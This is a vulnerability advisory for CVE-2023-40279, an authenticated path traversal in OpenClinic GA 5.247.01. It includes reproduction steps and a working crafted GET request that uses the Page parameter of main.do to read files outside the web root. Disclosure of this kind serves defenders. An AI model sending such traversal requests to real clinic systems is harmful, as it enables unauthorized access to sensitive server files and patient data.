A Directory Path Traversal vulnerability has been discovered in OpenClinic GA version 5.247.01, affecting the main.do component. This vulnerability enables authenticated attackers to traverse the server's directory structure via the Page parameter in a GET request, allowing for the unauthorized retrieval and execution of files from arbitrary directories.
CVE ID: CVE-2023-40279
Exploit Title: Authenticated Directory Path Traversal via main.do in OpenClinic GA 5.247.01
Date Discovered: 2023-08-14
Affected Software: OpenClinic GA version 5.247.01
Vendor: OpenClinic
Software Link: SourceForge Project Page
Tested Environments: Windows 10, Windows 11
The vulnerability resides in the handling of the Page parameter within the main.do request. Improper validation of this parameter allows authenticated users to construct a GET request that can traverse directories and access or execute files outside the application's intended directories, posing a significant security risk.
Steps to Reproduce:
1. Crafting the Malicious GET Request:
Use a web browser or an HTTP request tool such as curl or Burp Suite.
Construct the GET request as below, using ../../main.jsp to navigate directories and access main.jsp:
GET /openclinic/main.do?Page=../../main.jsp HTTP/1.1
Host: 192.168.100.5:10088
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
Connection: close
Cookie: JSESSIONID=[SESSION ID]
Cache-Control: max-age=0
Replace [SESSION ID] with a valid session ID from an authenticated user session.
2. Confirming the Vulnerability:
Send the crafted GET request to the server.
If the server responds by providing the content of main.jsp or any file outside the intended directory, it confirms the existence of a directory path traversal vulnerability. This access could lead to the disclosure of sensitive information or facilitate more severe attacks.
By exploiting this vulnerability, attackers could potentially access sensitive system files or execute unauthorized actions on the server, leading to data breaches, system compromise, and a significant breach of security protocols.